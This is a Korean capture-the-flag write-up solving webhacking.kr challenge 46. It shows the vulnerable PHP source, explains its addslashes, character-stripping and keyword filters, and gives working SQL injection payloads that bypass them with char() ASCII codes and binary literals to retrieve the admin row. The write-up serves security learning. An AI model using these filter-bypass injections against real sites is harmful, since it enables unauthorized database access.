# old-46

날짜: 2022년 4월 5일
담당자: sanghee park
상태: Challenge
속성: database, sql injection
점수: 30

[Challenge 46](https://webhacking.kr/challenge/web-23/?lv=1)

- 문제풀이
    1. 1을 입력해보니 money 1100이 뜬다. 
        
        ![Untitled](old-46%2098fa2699edd34a9fbe9fc400442b30a3/Untitled.png)
        
    2. view-source 를 클릭하여 소스를 살펴보자.
    - 소스 코드
        
        ```jsx
        <?php
          include "../../config.php";
          if($_GET['view_source']) view_source();
        ?><html>
        <head>
        <title>Challenge 46</title>
        </head>
        <body>
        <h1>SQL INJECTION</h1>
        <form method=get>
        level : <input name=lv value=1><input type=submit>
        </form>
        <hr><a href=./?view_source=1>view-source</a><hr>
        <?php
          if($_GET['lv']){
            $db = dbconnect();
            $_GET['lv'] = addslashes($_GET['lv']);
            $_GET['lv'] = str_replace(" ","",$_GET['lv']);
            $_GET['lv'] = str_replace("/","",$_GET['lv']);
            $_GET['lv'] = str_replace("*","",$_GET['lv']);
            $_GET['lv'] = str_replace("%","",$_GET['lv']);
            if(preg_match("/select|0x|limit|cash/i",$_GET['lv'])) exit();
            $result = mysqli_fetch_array(mysqli_query($db,"select id,cash from chall46 where lv=$_GET[lv]"));
            if($result){
              echo("{$result['id']} information<br><br>money : {$result['cash']}");
              if($result['id'] == "admin") solve(46);
            }
          }
        ?>
        </body>
        </html>
        ```
        
    
    1. id 값이 ‘admin’이면 풀리는 것 같다. 
        
        ```jsx
        if($result['id'] == "admin") solve(46);
        ```
        
    2. 해당 페이지는 다음 쿼리 문을 통해 id를 확인한다.
        
        → 즉, 정리하면 lv값을 addslashes를 통해 문자를 처리하고 각 문자를 삭제한 뒤 필터링을 거쳐 query에 넣는 것이다. 많은 필터링을 거친 후 db로부터 받은 id가 admin이면 성공
        
        ```jsx
        "select id,cash from chall46 where lv=$_GET[lv]"
        ```
        
    
    1. 필터링 함수를 살펴보자.
        - addslashes()
            
            ```jsx
             $_GET['lv'] = addslashes($_GET['lv']);
            ```
            
            - addslashes() 함수는 미리 정의된 문자 앞에 백슬래시가 있는 문자열을 반환한다.
            - 미리 정의된 문자는 다음과 같다.
                - ‘ (작은 따옴표)
                - “(큰 따옴표)
                - \ (백 슬래시)
                - NUL (공백)
            - 예시
                
                ![Untitled](old-46%2098fa2699edd34a9fbe9fc400442b30a3/Untitled%201.png)
                
            
            **따라서, 문자열 안의 특수문자가 잘 인식되도록 역슬래시를 추가해주는 함수이기 때문에 이 코드에서는 ‘, “, \, NUL을 이용한 공격이 무효화된다.** 
            
            [PHP addslashes() Function](https://www.w3schools.com/php/func_string_addslashes.asp)
            
        - str_replace()
            
            ```jsx
            		$_GET['lv'] = str_replace(" ","",$_GET['lv']);
                $_GET['lv'] = str_replace("/","",$_GET['lv']);
                $_GET['lv'] = str_replace("*","",$_GET['lv']);
                $_GET['lv'] = str_replace("%","",$_GET['lv']);
            ```
            
            - 공백문자, /, *, %를 전부 지워버림.
        - preg_match()
            
            ```jsx
            f(preg_match("/select|0x|limit|cash/i",$_GET['lv'])) exit();
            ```
            
            - preg_match(*pattern, input, matches, flags, offset*) 형태로, `preg_match()`함수는 문자열에서 일치 항목이 발견되었는지 여부를 반환합니다. pattern과 input은 필수 매개 변수여야 한다. 여기서의 패턴은 `/select|0x|limit|cash/i`이다.
            - select, 0x, limit, cash 사용 불가
            - 0x : hex (16진수)값 필터링
            
            즉, `/select|0x|limit|cash/i` 패턴과 일치하는 항목이 있으면 exit() 하라는 것이다. 
            
            [PHP preg_match() Function](https://www.w3schools.com/php/func_regex_preg_match.asp)
            
    
    1. 따라서 위의 필터링 되는 문자들을 사용하지 않고 get 방식으로 admin이라는 id를 넣어보자. 
        
        허용되는 것들: =, (), #, ||, &&, 0b 등
        
        아스키 값 또는 BIN(2진수)로 우회할 수 있다.  HEX는 필터링되기 때문에 사용 불가.
        
    2. 아래 $_GET[lv]에 injection 구문을 넣어야 한다. 
        
        ```jsx
        "select id,cash from chall46 where lv=$_GET[lv]"
        ```
        
    3. **`lv=8||id=char(97,100,109,105,110)`** 라는 값을 넣어보려 했다. 
        
          *(97,100,109,105,110)은 admin의 아스키 값* 
        
        `char()` 함수는 아스키 코드가 할당되고 이를 문자로 반환한다. 
        
    
    ```jsx
    select id from chall49 where lv=8||id=char(97,100,109,105,110)
    ```
    
    이렇게 대입하면 앞의 lv=8은 거짓이 되고 `||(띄워쓰기를 할 수 없으니 ||를 사용,or)` 뒷부분의 id=char(97,100,109,105,110)은 참이 되므로 결국 참. 따라서 쿼리문을 줄여본다면
    
    ```jsx
    select id from chall49 where id=char(97,100,109,105,110)
    ```
    
    라고 나온다. 해석하자면 chall49 테이블의 id=admin인 부분의 id 데이터를 가져온다. 
    
    1. 입력해보자. 
        
        ![Untitled](old-46%2098fa2699edd34a9fbe9fc400442b30a3/Untitled%202.png)
        
    2. 성공!
        
        ![Untitled](old-46%2098fa2699edd34a9fbe9fc400442b30a3/Untitled%203.png)
        
    
    번외) 2진수로도 풀 수 있다. 
    
    `**lv=8||id=0b0110000101100100011011010110100101101110**`